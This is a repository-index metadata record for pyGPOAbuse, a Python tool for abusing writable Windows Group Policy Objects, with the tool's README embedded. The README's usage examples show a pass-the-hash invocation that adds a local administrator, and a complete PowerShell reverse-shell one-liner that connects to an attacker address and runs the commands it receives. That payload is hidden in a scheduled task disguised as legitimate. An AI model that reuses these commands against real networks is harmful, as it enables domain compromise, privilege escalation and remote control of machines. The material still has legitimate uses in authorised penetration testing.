{"id":18864767,"url":"https://github.com/hackndo/pygpoabuse","last_synced_at":"2025-04-05T09:07:58.450Z","repository":{"id":39865882,"uuid":"262877735","full_name":"Hackndo/pyGPOAbuse","owner":"Hackndo","description":"Partial python implementation of SharpGPOAbuse","archived":false,"fork":false,"pushed_at":"2024-02-18T19:23:57.000Z","size":389,"stargazers_count":406,"open_issues_count":6,"forks_count":47,"subscribers_count":4,"default_branch":"master","last_synced_at":"2025-03-29T08:07:03.773Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Hackndo.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-05-10T21:21:27.000Z","updated_at":"2025-03-26T16:29:37.000Z","dependencies_parsed_at":"2024-02-18T20:30:30.189Z","dependency_job_id":"aa400b22-99b0-4eea-8f97-25b510faa222","html_url":"https://github.com/Hackndo/pyGPOAbuse","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2FpyGPOAbuse","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2FpyGPOAbuse/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2FpyGPOAbuse/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Hackndo%2FpyGPOAbuse/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Hackndo","download_url":"https://codeload.github.com/Hackndo/pyGP
OAbuse/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247312081,"owners_count":20918344,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T04:43:58.722Z","updated_at":"2025-04-05T09:07:58.396Z","avatar_url":"https://github.com/Hackndo.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# pyGPOAbuse\r\n\r\n## Description\r\n\r\nPython **partial** implementation of [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) by [@pkb1s](https://twitter.com/pkb1s)\r\n\r\nThis tool can be used when a controlled account can modify an existing GPO that applies to one or more users \u0026 computers. 
It will create an **immediate scheduled task** as **SYSTEM** on the remote computer for a computer GPO, or as the logged-in user for a user GPO.\r\n\r\nThe default behavior adds a local administrator.\r\n\r\n![Example](https://github.com/Hackndo/pygpoabuse/raw/master/assets/demo.gif)\r\n\r\n## How to use\r\n\r\n### Basic usage\r\n\r\nAdd the **john** user to the local administrators group (Password: **H4x00r123..**)\r\n\r\n```bash\r\n./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\"\r\n```\r\n\r\n### Advanced usage\r\n\r\nReverse shell example\r\n\r\n```bash\r\n./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" \\\r\n    -powershell \\\r\n    -command \"\\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\\$stream = \\$client.GetStream();[byte[]]\\$bytes = 0..65535|%{0};while((\\$i = \\$stream.Read(\\$bytes, 0, \\$bytes.Length)) -ne 0){;\\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\\$bytes,0, \\$i);\\$sendback = (iex \\$data 2\u003e\u00261 | Out-String );\\$sendback2 = \\$sendback + 'PS ' + (pwd).Path + '\u003e ';\\$sendbyte = ([text.encoding]::ASCII).GetBytes(\\$sendback2);\\$stream.Write(\\$sendbyte,0,\\$sendbyte.Length);\\$stream.Flush()};\\$client.Close()\" \\\r\n    -taskname \"Completely Legit Task\" \\\r\n    -description \"Dis is legit, pliz no delete\" \\\r\n    -user\r\n```\r\n\r\n\r\n## Credits\r\n\r\n* [@pkb1s](https://twitter.com/pkb1s) for [SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse)\r\n* [@airman604](https://twitter.com/airman604) for [schtask_now.py](https://github.com/airman604/schtask_now)\r\n* [@SkelSec](https://twitter.com/skelsec) for 
[msldap](https://github.com/skelsec/msldap)\r\n\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackndo%2Fpygpoabuse","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhackndo%2Fpygpoabuse","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhackndo%2Fpygpoabuse/lists"}